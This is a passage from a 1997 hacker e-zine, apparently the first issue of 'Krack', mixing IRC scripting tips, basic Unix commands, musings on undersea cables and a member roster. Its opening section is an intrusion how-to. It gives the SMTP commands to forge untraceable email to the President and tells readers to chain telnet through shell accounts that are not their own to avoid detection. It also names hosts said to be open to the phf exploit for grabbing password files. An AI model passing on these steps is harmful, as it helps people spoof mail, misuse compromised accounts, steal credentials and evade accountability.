emails to the President, AND GET AWAY WITH IT!!! In order to do this you MUST know something about sending anonymous email. What you will need: an anonymous email server 3 shell accounts with any telnetable UNIX system. the presidents email (All of these are provided) Ok, now here we go. In order to save your ass from getting caught you MUST telnet to at least three other sites before telneting to the email server of your choice (prefferably one using an older version of sendmail). So first of all, get out the old telnet client and telnet to where ever you have an account (make sure it is not your account, or you are gonna get busted). Once you connect to the account login, and from there telnet out again to another different account: ei: telnet myshell.whatever.org From there do the same thing, telnet out again to the third, and final account. Once in the third account you must connect to the email server you are going to use to send this mail from. Below is a list(note some of these may have upgrade, and are no longer anonymous, but you should still be pretty safe as long as you telnet to those sites first): www.zombie.com mail.sgi.net mail.westol.com mail.vcalpha.com (Note: when connecting to a mail server you MUST connect to port 25) Ok, now, you are in the third account type: telnet my.mail.server 25 You will see something like: 220 bla.bla.bla ESMTP Sendmail 8.8.5/8.8.5; Thu, 27 Feb 1997 16:05:39 -05 00 (EST) You must type HELO me.com (or wherever ever you want the mail to be comming from) MAIL FROM: wherever@me.com (or wherever you want the full email address of where you are sending from) RCPT TO: President@whitehouse.com DATA What ever you wish to right . (Put the . on a line by it's self to stop the message) Note: you can send multiple messages. Simply by starting the process over again after the . with another MAIL FROM: command. To quit send simply type quit. PLACE TO GET UNIX SHELLS: www.csmc.edu www.dardan.com www.fxmedi.com All of the above sites have the phf exploit and the password file can be EASILY aquired. DON'T GET CAUGHT! C_M ~~~~Added By Cool_Mode~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- Tips From Sygma: Welcome to The First Issue of The Krack EZine. I, Sygma, will be showing you some cool trick and hacking. I would also like to say (So I don't get in Shit), that all the informatino presented on this page is for educational perposes ONLY... but we all know thats not what your going to be using it for. Anyways I will be covering in every Issue, IRC Scripting, Unix, and 95 (Yes 95.. Some Tricks and shit for dummies, cause some people need it, no Names to be said). If you need back issues and so on, check www.on-it.net/~sygma/Krack (Which is not up yet cause I need to make it :)) In all issues there is going to be a little area about stuff that I write on, my views and so on. First, my views :). I was reading TIME (Feb 3rd, 1997) and got to page 53 or so. The article is called INFO PIPLINES. I was looking at the double page map and looked at the legend. Now would somone explain to me why we run Coaxial Cables to South America, and some 2.5 Gigabits a sec lines (Coaxial what were they thinking?). On the Right hand side I was reading that in Europe/Asia a "SEA-ME-WE 3, operational around 1999, initially 10 gigabits per sec. Hint: Look at the word SEA then you'll find out where it runs. Here is a Quote from TIME: "I'll put a girdle 'round about the earth in 40 minutes," declared Puck in A Midsummer Night Dream. Four hundred years after the play was first produced, the globe is being girdled more thoroughly then Shakespeare ever dreamed. The transocceanic copper wires that made communications possible in the presatellite era are being replaced by arrays of sophisticated fibre optic capable of carrying huge amounts of data more reliably then the electronic birds circling in the upper atmosphere. These new data links are the oil piplines of the information age, the prime conduits for the tech-nological revolution. Where and how they are built points the way to future change. The FLAG (FibreOptic Link Around the Globe) project, a $1.5 Billion, 28 000 KM underwater cable snaking its way across the ocean floor from Britain to Japan, is nearly complete. When finished, it will offer uninterrupted data traffic between Europe and Asia, traffic that currently must be routed through the U.S. It is akin to openeing a new navigational route that will link 75% of the World's Population. It's 5 gigabits of information per second will allow for a huge increase in electronic traffic. Another megaproject that will alter informational trade routes is the $1.73 Billion SEA-ME-WE 3 cable, approved in January by the 70 countries invloved in its construction. Strtching 38 000 KM, it will by 1999 connect SouthEast Asia, Weestern Europe...." This Article goes on for quite awhile, but this is the part that interests me. We get all this lag on irc and all, since not all the servers run the same line. Dallas for instance is the fastest irc server, connection wise. Followed by Washington and Vancouver if I can remember well. Only if all the servers would be running the same speed connection we would not have as many problems. Think About it. Now onto the Irc Scripting section. I'm going to start this off REALLY easy. Like this is so easy you would think that a newborn kid could do it. -= Alias =- I have added some Easy to Use aliases. /i+ /mode # +i /i- /mode # -i /n+ /mode # +n /n- /mode # -n /m+ /mode # +m /m- /mode # -m /t+ /mode # +t /t- /mode # -t /s- /mode # -s /s+ /mode # +s /p+ /mode # +p /p- /mode # -p /k+ /mode # +k $$1 /k- /mode # -k $$1 /v+ /mode # +v $$* /v- /mode # -v $$* /l+ /mode # +l $$1 /l- /mode # -l -= Events =- I will be using a 10 level system. 10. Protect, Ops, and so on... the rest of the levels I'll think of.. 1 is shitlist tho :) 8 will be just ops. 10:ON JOIN:#:/mode $chan +o $nick 8:ON JOIN:#:/mode $chan +o $nick ok now see how easy I started? (I'm actually crying now, this is sooooooo funny) anyways. -= Popups =- under Nicknames List add this User Levels: .Friend ..Add:/guser 8 $* 3 ..Remove:/ruser 1 $* .Friend (level 10) ..Add:/guser 10 $* 3 ..Remove:/ruser 1 $* .Add User:/auser =6 $* Ok enough of that Section.. hehehe Ok now for the Unix Section. This is going to start off from beginner to expert. We get those people joining #Hackteach asking for help and some how end up getting banned. AHEM I won't mention nicks. This first one will be basic unix commands and stuff. Why? Because I'm running out of time to do more. Was on a ski trip last week. -=PLEASE NOTE, what I put in CAPS MUST BE in Caps, case sensitive =- ls - This is the Unix command for 'dir' mv - move cp - copy mkdir - make a directory ps - check processes w - show users finger - uhhh.. better let urself figure this out. Ok I'm like outta time..cause ti's about 9: pm right now.. and I need to finish 3 essays for tomorrow.. if u have any questions or comments, please Email me: Sygma@Pegasus.on-it.net. Also I don't want to get some bullshit mail. ~~~~Added By Sygma~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- List of members: Members with a > next to their name donated to this issue... All other members who dont have that are either on probation... or have a special arrangement with me. >DocKool Leader/Programmer/ DocKool@hotmail.com >NeTDeViL Leader/HTML Editor/Phreak NeTD@hotmail.com KaMeLeoN Leader/Founder/Grafix Expert Liongrafx@hotmail.com >Sygma Writer/Scripter Sygma@pegasus.on-it.net >BlueRain Writer/Programmer pmurgs@aztec.co.za KidLinux Writer/Programmer infs00ca@frank.mtsu.edu OoPTiCoO Writer/ ay921@rfgn.epcc.edu Cyb3rCh|k Writer/ cyb3rchik@worldnet.att.com DeathLike Writer/ Deathlike@hotmail.com >Defiant Writer/ Sborosh@skyenet.net >Dislexic Writer/WebDesign/Security jhanna29@ally.ios.com >Od^Phreak Writer/Unix Haxor butler@tir.com Zophar Writer/Phreak zophar@ix.netcom.com >Cool_Mode Writer/Unix Hacker coolmode@sgi.net --------------------------------------------------------------------------- --------------------------------------------------------------------------- Closing notes: Wassup Wassup Wassup, This is NetDevil your Zine Editor. I been away awhile but were back, and Doc, Kame, and I are bringing Krack back strong. But we need yer help... if you have anything we can use, from the newest bugs in popular software to well... anything we can use... please email it to me. A special thanx go out to all the members... especially those who donated... it was through your hard work and efforts that the rising of Krack was able to put this out... thanx again to everyone. NeTDeViL P.S. I threw in some helpful links below... chek em out. www.microsoft.com --- Microsofts home page... includes dnloadable soft. www.netscape.com --- Netscapes home page... does this software work??? www.yahoo.com --- search engine www.lycos.com --- search engine www.webcrawler.com --- search engine www.altavista.com --- search engine www.hotmail.com --- free web based email www.netmanage.co.jp/news/jetmail.htm --- free web based email www.geocities.com --- free web space for web pages www.angelfire.com --- free web space for web pages www.mirc.co.uk --- mIRCs downloadble software www.tucows.com --- free utilities --------------------------------------------------------------------------- --------------------------------------------------------------------------- This Has Been a K.R.A.C.K. production. Thank you for Choosing K.R.A.C.K Killer Ride And Chillin Kraftwork Also With 10010011 1000110 10010001 10101001 10101001 CyBrids CSE The Taste of a new Genre ;) 10101001 1010101 11010010 10101010 10101010 Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz!